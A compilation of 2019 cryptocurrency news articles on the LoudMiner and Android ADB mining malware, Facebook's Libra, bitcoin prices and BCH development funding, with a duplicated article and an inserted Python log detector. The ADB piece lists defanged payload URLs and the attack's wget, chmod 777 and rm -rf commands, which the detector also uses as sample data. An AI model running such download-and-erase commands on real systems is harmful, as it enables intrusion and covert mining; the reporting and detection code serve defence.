Researchers Uncover Threat of ‘Unusual’ Virtual Machine Crypto Mining

Cybersecurity firm ESET has detected what it describes as an unusual and persistent cryptocurrency miner distributed for macOS and Windows since August 2018. The news was revealed in a report from ESET Research published on June 20. According to ESET, the new malware, dubbed “LoudMiner,” uses virtualization software — VirtualBox on Windows and QEMU on macOS — to mine crypto on a Tiny Core Linux virtual machine, thus having the potential to infect computers across multiple operating systems. The miner itself reportedly uses XMRig — open-source software used for mining the privacy-focused altcoin monero (XMR) — and a mining pool, thereby purportedly thwarting researchers’ attempts to retrace transactions.
The research revealed that for both macOS and Windows, the miner operates within pirated applications, which are bundled together with virtualization software, a Linux image and additional files. Upon download, LoudMiner is installed before the desired software itself, but conceals itself and only becomes persistent after reboot. ESET notes that the miner targets applications whose purposes are related to audio production, which usually run on computers with robust processing power and where high CPU consumption — in this case caused by stealth crypto mining — might not strike users as suspicious. Moreover, the attackers purportedly exploit the fact that such applications are usually complex and large in order to conceal their virtual machine images. The researchers add: “The decision to use virtual machines instead of a leaner solution is quite remarkable and this is not something we routinely see.” ESET has identified three strains of the miner targeted at macOS systems, and just one for Windows thus far.
As a warning to users, the researchers state that “obviously, the best advice to be protected against this kind of threat is to not download pirated copies of commercial software.” Nonetheless, alongside high CPU consumption, they offer several hints to help users detect that something might be awry, including trust popups from an unexpected, “additional” installer, a new service added to the startup services list (Windows) or a new Launch Daemon (macOS). Network connections to unusual domain names — due to scripts inside the virtual machine that contact the C&C server to update the miner’s configuration — are another giveaway, the researchers add. Yesterday, Cointelegraph published an in-depth…

BIS: Facebook’s Foray into Cryptocurrency Poses New Risks for Banks

The Bank for International Settlements (BIS) has warned that the financial services poised to be offered by big tech firms such as Facebook, Google and Amazon could generate new risks for the banking sector. The BIS — an international financial institution in Switzerland owned by 60 of the world’s central banks — published a report outlining its stance on June 23. Hot on the heels of Facebook’s newly announced cryptocurrency, Libra, the BIS said that while big tech firms’ foray into finance can bring efficiency gains and broaden financial inclusion, regulators must step up their action to mitigate the new and complex risks involved. According to the BIS, big tech firms’ extensive user base, access to user data and multi-faceted business models have the potential to rapidly change the financial services industry. Their low-cost business structure is highly scalable, and the network structure of widely visited platforms can help promote financial inclusion in populations that remain underbanked, it notes. Yet, the BIS warns, “the very features that bring benefits also have the potential to generate new risks and costs associated with market power.”
The BIS claims that big tech firms introduce both known and new, unfamiliar risks to the financial services landscape. Among the established issues, it notes the risks to financial stability and consumer protection posed by tech giants that “have the potential to loom large very quickly as systemically relevant financial institutions” — thereby disrupting the traditional banking sector and existing structure of financial intermediation. The report notes that such firms efficiently leverage a “data-network-activities loop” that could well accelerate the success of their entry into finance, yet this very business model raises new and unprecedented challenges for regulators — notably competition and data privacy issues.
Given that firms such as Facebook straddle traditional regulatory perimeters and national borders, the BIS calls for national and international coordination among authorities to “ensure a level playing field between big techs and banks.” As previously reported, Facebook published the white paper for its long-awaited cryptocurrency and blockchain-based financial infrastructure project, Libra, on June 18. International reactions to Libra have thus far been mixed, including ambivalent remarks from the Chair of the United States Federal Reserve, and a statement from the chairman of the Russian…

Bitcoin Hits 15-Month High as Naysayers Double Down on ‘Dead Cat Bounce’

Bitcoin (BTC) was holding steady around $10,850 on June 24 after a fresh surge took it above $11,000 for the first time in over a year. Data from Coin360 showed a slight correction kicking in for bitcoin on Monday, with markets consolidating gains after a dramatic weekend. BTC/USD had climbed as high as $11,230 in recent days, marking its best performance since early March 2018. The action did not go unnoticed, with mainstream media titles appearing to struggle with explaining the return of a cryptocurrency they had previously declared all but dead. Many quoted traditional finance sources who maintained that the current bull run is doomed to fail and that bitcoin investors will ultimately lose everything in fiat terms. “Don’t get fooled by the dead-cat bounce this year,” Whitney Tilson, founder of Empire Financial Research and a former hedge-fund manager, said, as quoted by Bloomberg. “Mark my words: A year from now, it will be a lot lower. This is a techno-libertarian pump-and-dump scheme that will end in ruin.” Bitcoin’s weekly gains currently total just over 17%, while monthly returns are closer to 35%.
Altcoins fared somewhat worse as BTC/USD corrected, with many in the top twenty by market cap shedding 2-3% in the 24 hours to press time. Ethereum (ETH) fell 3% to hit $306, while Ripple (XRP) was trading 5% lower at just over $0.45 per token. Bucking the trend was Tron (TRX), which gained 3.1% after the network saw the launch of its first stablecoin asset. The total cryptocurrency market cap is now comfortably above $300 billion, with Bitcoin’s weekend moonshot further expanding its market dominance to more than 59%. As Cointelegraph reported, multiple significant factors suggest the largest cryptocurrency’s longer-term trajectory will take it far past previous all-time highs.

A Monumental Fight Over Facebook’s Cryptocurrency Is Coming

Michael J. Casey is the chairman of CoinDesk’s advisory board and a senior advisor for blockchain research at MIT’s Digital Currency Initiative. The following article originally appeared in CoinDesk Weekly, a custom-curated newsletter delivered every Sunday exclusively to our subscribers.
Given how long Washington lawmakers have taken to devise a coherent, informed view of cryptocurrency, the Chair of the House Financial Services Committee’s leap to action last week over Facebook’s ambitious Libra project was remarkably fast. But let’s reflect not on the details of Rep. Maxine Waters’ (D-Calif.) urgent requests that Facebook cease work on Libra until after hearings are held or on how European lawmakers made similar appeals. The important takeaway from these legislators’ actions is that they are able to make such demands at all, since this is not the case with truly decentralized projects. Unlike with bitcoin, representatives in Congress can directly identify and talk to the people in charge of the Libra project. They can subpoena them and, thus, pressure them. They might start with David Marcus, head of Facebook subsidiary Calibra, but, ultimately, it’s Facebook CEO Mark Zuckerberg who’ll give lawmakers the greatest leverage. In this case, the buck stops with Zuck. Now, imagine a Congressional leader calling for a halt in bitcoin development. Who exactly are they going to pressure to end an open-source project involving millions of globally spread, mostly unidentifiable developers, miners and users? This distinction – between one project with a single, identifiable authority figure and another whose governance is distributed and leaderless with a founder who has never revealed their identity – goes to the heart of a crypto community critique that the social media giant’s initiative is not censorship resistant. When there’s someone in charge, an interested party – a policymaker, a banker, a regulator, a shareholder – can lean on them to make changes.
And when the blockchain consensus model is based on a club-like permissioned membership, a coordinated effort to alter, or censor, the ledger is always possible. And if the ledger or its software can be altered by this pressure, the Libra platform can’t unconditionally promise to support open, unfettered access for users and a permissionless innovation environment for developers. Let’s be clear: Libra’s designers have thought deeply about how…

TrendMicro Detects Crypto Mining Malware Affecting Android Devices

A new cryptocurrency-mining botnet has been detected exploiting Android Debug Bridge (ADB) ports. ADB is a system, installed on a majority of Android phones and tablets, designed to resolve app defects. The botnet malware, as reported by Trend Micro, has been detected in 21 countries and is most prevalent in South Korea. The attack takes advantage of the way open ADB ports don’t require authentication by default, and once installed is designed to spread to any system that has previously shared an SSH connection. SSH connections connect a wide range of devices – everything from mobile to Internet of Things (IoT) gadgets – meaning a lot of products are susceptible. “Being a known device means the two systems can communicate with each other without any further authentication after the initial key exchange, each system considers the other as safe,” the researchers say. “The presence of a spreading mechanism may mean that this malware can abuse the widely used process of making SSH connections.”
It begins with an IP address. 45[.]67[.]14[.]179 arrives through the ADB and uses the command shell to update the working directory to “/data/local/tmp,” as .tmp files often have default permission to execute commands. Once the bot determines it has entered a honeypot, it uses the wget command to download the payload of three different miners, and curl if wget is not present in the infected system. The malware determines which miner is best suited to exploit the victim depending on the system’s manufacturer, architecture, processor type, and hardware. An additional command, chmod 777 a.sh, is then executed to change the permission settings of the malicious drop. Finally, the bot conceals itself from the host using another command, rm -rf a.sh*, to delete the downloaded file. This also hides the trail of where the bug originated from as it spreads to other victims.
Researchers examined the invading script and determined the three potential miners that can be used in the attack – all delivered by the same URL – are: http://198[.]98[.]51[.]104:282/x86/bash, http://198[.]98[.]51[.]104:282/arm/bash and http://198[.]98[.]51[.]104:282/aarch64/bash. They also found the script enhances the host’s memory by enabling HugePages, which allows memory pages larger than the default size, to optimize mining output. If miners are already found using the system the botnet attempts to invalidate their URL and kill them by…
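The command sequence described above (a shell working in /data/local/tmp, a wget or curl download, chmod 777 on the dropped script, then rm -rf of that same script) can be matched in shell audit records. The following Python is an added example, not code from Trend Micro or the original article; the log format, the session ids and the host 203.0.113.7 are constructed assumptions.

```python
import posixpath
import shlex
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample records: "<epoch> <session-id> <command line>".
# 203.0.113.7 is a documentation address, not an indicator from the report.
SAMPLE_LOG = """\
1561370001 s1 cd /data/local/tmp
1561370002 s1 wget http://203.0.113.7/a.sh
1561370003 s1 chmod 777 a.sh
1561370005 s1 rm -rf a.sh*
1561370100 s2 cd /data/local/tmp
1561370101 s2 curl -O http://203.0.113.7/a.sh
1561370102 s2 chmod 777 a.sh
1561370103 s2 rm -rf a.sh*
1561370200 s3 cd /sdcard/Download
1561370201 s3 wget https://example.org/notes.txt
1561370202 s3 rm notes.txt
1561370300 s4 chmod 777 a.sh
1561370301 s4 rm -rf a.sh*
"""

STAGING_DIR = "/data/local/tmp"  # working directory named in the article


def parse_records(text):
    """Yield (timestamp, session, command) from well-formed lines only."""
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3 and parts[0].isdigit():
            yield int(parts[0]), parts[1], parts[2]


def find_drop_and_erase(text):
    """Return sessions that download a file, chmod 777 it, then delete it."""
    sessions = defaultdict(list)
    for ts, sid, cmd in parse_records(text):
        sessions[sid].append((ts, cmd))

    findings = []
    for sid, cmds in sessions.items():
        in_staging = False
        tracked = {}  # downloaded file name -> details gathered so far
        for _, cmd in sorted(cmds):
            try:
                argv = shlex.split(cmd)
            except ValueError:  # unbalanced quotes: skip the record
                continue
            if not argv:
                continue
            tool, args = argv[0], argv[1:]
            if tool == "cd" and args:
                in_staging = args[-1].rstrip("/") == STAGING_DIR
            elif tool in ("wget", "curl"):
                for arg in args:
                    try:
                        url = urlparse(arg)
                        host = url.hostname
                    except ValueError:  # malformed URL argument
                        continue
                    name = posixpath.basename(url.path)
                    if url.scheme in ("http", "https") and host and name:
                        tracked[name] = {
                            "session": sid, "script": name, "tool": tool,
                            "host": host.replace(".", "[.]"),  # defanged
                            "in_staging_dir": in_staging, "chmod_777": False,
                        }
            elif tool == "chmod" and "777" in args:
                for arg in args:
                    if arg in tracked:
                        tracked[arg]["chmod_777"] = True
            elif tool == "rm":
                for arg in args:
                    hit = tracked.get(arg.rstrip("*"))  # "a.sh*" -> "a.sh"
                    if hit and hit["chmod_777"]:
                        findings.append(tracked.pop(hit["script"]))
    return findings


if __name__ == "__main__":
    for finding in find_drop_and_erase(SAMPLE_LOG):
        print(finding)
```

Sessions s3 (an ordinary download and cleanup) and s4 (chmod and delete with no preceding download) are not reported, which keeps the rule tied to the full download, chmod, delete chain rather than to any single command.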

Bitcoin Tops $11.3K to Hit Fresh 2019 Highs

Bitcoin has set a new price high for 2019, reaching as high as $11,304 today before conceding a short-term period of profit taking. At 21:00 UTC on June 23, the world’s largest cryptocurrency by market capitalization shot upwards on the daily chart, cementing a new high beyond June 22’s peak of $11,215. The move to another 2019 high comes after bitcoin’s price dropped to as low as $10,416 on June 23 before another surge of buying pressure pushed prices back above $10,750 within the same day. From there, BTC gained 6 percent, rising above $11,000 at around 19:00 UTC on Sunday evening and then reaching over $11,300 two hours later. It’s currently changing hands at $10,768 as per CoinDesk’s price data. BTC’s 2019 bull run has already started off with a bang in recent weeks, likely a combination of traders buying into their own fear-of-missing-out (FOMO) as well as institutions chasing the tail end of the announcement of Facebook’s project Libra. However, large levels of volume failed to accompany the rally: volume began at 97.6 billion traded over a 24-hour period and continued to decrease to as low as 67.5 billion by day’s end, meaning that the move was unsupported and a small sell-off from that point on was definite. Its “Real 10” volume – a metric that takes into account trading volume from exchanges reporting honest volume figures as identified in a report by Bitwise Asset Management – currently stands at $46.17 billion, a large difference, according to Messari.io. Meanwhile, the rest of the market remains relatively flat today, with but a few in the top 20 posting gains. Cardano (ADA) and UNUS SED LEO (LEO) are the only two in the green within the top 20 at CoinMarketCap and are both posting 0.4-2.4 percent growth, respectively, over a 24-hour period.
In addition, the total market capitalization rose to a high of $331.8 billion, its highest point since July 31, 2018, while the market capitalization for altcoins is down $3.8 billion over a 24-hour period, pointing to a preference for holding BTC above all else amongst the trading elite. Disclosure: The author holds no cryptocurrency at the time of writing.

Where to Find Bitcoin’s Rising Stars

Thirteen coders and academics gathered this week at Chaincode Labs in New York City for the bitcoin protocol residency program, in what organizers say is the most intensive and diverse cohort to date. It would be hard to overstate how impactful this quiet program is, as one of the few resources for independent developers in the bitcoin ecosystem. Members of the program’s prior three cohorts went on to create the lightning browser extension Joule as well as the nonprofit educational resource Bitcoin Optech. Matt Corallo, an alum of the 2016 residency, authored notable efficiency improvements such as FIBRE and the rust-lightning implementation, which makes it easier for users to build and interact with layers of the bitcoin network. “Having diverse funding sources for bitcoin protocol development is essential to maintain decentralization,” said Alex Morcos, co-founder of Chaincode Labs, which funds the program. “The good news is that more organizations fund open-source developers than ever before, including the MIT Digital Currency Initiative, Blockstream, DG Labs, Square, Xapo and others.” According to the residency organizer, Adam Jonas, this year’s 12-week program is the longest session to date. Out of 216 applicants from 39 countries, this fourth class will include eight developers completing the entire program. The other five participants, including a few academics who don’t write code, were only able to attend for roughly three weeks of seminars. The second portion of the residency, after these seminars, is focused on supporting residents as they build independent, shippable projects. 
Announcing our summer 2019 Chaincode residents: Antoine, Amiti @amizi, Carla @actuallycarlakc, Elichai @Elichai2, Fabian @fjahr, Hugo @hugohanoi, James @digi_james, Richard @remyers_, Tim @takinbo (1/3) — Chaincode Labs (@ChaincodeLabs) May 23, 2019
A significant portion of the program’s reading materials and presentations will also be shared online through sites like GitHub, so that anyone can use them for studying at home. “It’s by far the longest [program] we’ve ever done,” Jonas said. “The whole idea is we’d like to make this residency available to people regardless of their circumstances. … We’ve just made sure that their costs are covered.” These stipends and flexible requirements, tailored to each participant’s needs, allowed people like lightning developer Jamal James to attend. As an entrepreneur and father of three, taking a whole summer off wouldn’t have been feasible. Yet he plans to…

Bitcoin Tests $11.3K With Fresh 2019 Highs

Bitcoin has broken yet another 2019 record, reaching as high as $11,304, before conceding a short-term period of profit taking. At 21:00 UTC on June 23, the world’s largest cryptocurrency by market capitalization shot upwards on the daily chart, cementing a new high beyond June 22’s peak of $11,215. The move to another 2019 high comes after bitcoin’s price dropped to as low as $10,416 on June 23 before another surge of buying pressure pushed prices back above $10,750 within the same day. From there, BTC gained 6 percent, rising above $11,000 at around 19:00 UTC on Sunday evening and then reaching over $11,300 two hours later. It’s currently changing hands at $10,768 as per CoinDesk’s price data. BTC’s 2019 bull run has already started off with a bang in recent weeks, likely a combination of traders buying into their own fear-of-missing-out (FOMO) as well as institutions chasing the tail end of the announcement of Facebook’s project Libra. However, large levels of volume failed to accompany the rally: volume began at 97.6 billion traded over a 24-hour period and continued to decrease to as low as 67.5 billion by day’s end, meaning that the move was unsupported and a small sell-off from that point on was definite. Its “Real 10” volume – a metric that takes into account trading volume from exchanges reporting honest volume figures as identified in a report by Bitwise Asset Management – currently stands at $46.17 billion, a large difference, according to Messari.io. Meanwhile, the rest of the market remains relatively flat today, with but a few in the top 20 posting gains. Cardano (ADA) and UNUS SED LEO (LEO) are the only two in the green within the top 20 at CoinMarketCap and are both posting 0.4-2.4 percent growth, respectively, over a 24-hour period.
In addition, the total market capitalization rose to a high of $331.8 billion, its highest point since July 31, 2018, while the market capitalization for altcoins is down $3.8 billion over a 24-hour period, pointing to a preference for holding BTC above all else amongst the trading elite. Disclosure: The author holds no cryptocurrency at the time of writing.

BCH Development Fund Doubles Its Goal After a Successful Month

In May, a group of Bitcoin Cash (BCH) supporting businesses and individuals launched a fundraiser to support BCH development. Since then the fundraiser has received massive support and so the organizers have decided to double the goal to 1600 BCH by August 1, 2019. Moreover, other projects have been added to the Bitcoin.com/fundraise page in order to include development projects like Bitcoin Verde and Flowee the Hub.

Support a Fairer Financial System by Donating to Bitcoin Cash Development

Development is important in order to maintain a strong cryptocurrency network and make sure it scales to meet the needs of everyone living on earth. The Bitcoin Cash (BCH) network aims to be the electronic peer-to-peer cash system as described in the whitepaper written by Satoshi Nakamoto more than 10 years ago. To ensure long-lasting and effective development, a group of crypto-based businesses and individuals started a fundraiser for open source developers working with the BCH chain. Originally the fundraiser had planned to raise 800 BCH for developers by August 1, but six days ago the fundraiser neared its goal. So the organization FVNI Development Society in collaboration with Bitcoin.com, Bitcoincash.org, Electron Cash, Bitcoincash.com, and various other businesses decided to double the goal. If you don’t know which project you would like to specifically donate to, you can simply donate to the BCH General Fund and your donation will go toward Bitcoin Cash development. Right now there are six different projects BCH fans can donate funds to: Bitcoin ABC, Bchd, Bitcoin Unlimited, Bcash, Bitcoin Verde, and Flowee the Hub. All the projects have different team members and unique types of BCH clients. Satoshi’s original implementation, for instance, was written in C++, but the protocol itself is compatible with any language as long as the software follows consensus rules.

Bitcoin Cash Protocol Implementations

Bitcoin ABC

Bitcoin ABC is a full node implementation of the Bitcoin Cash protocol written in C++; the ABC stands for Adjustable Blocksize Cap. The Bitcoin ABC client is the most dominant BCH implementation. At the moment, 54% of the current 1,549 public nodes running on the Bitcoin Cash network use ABC. The client is open source and the repository’s binaries…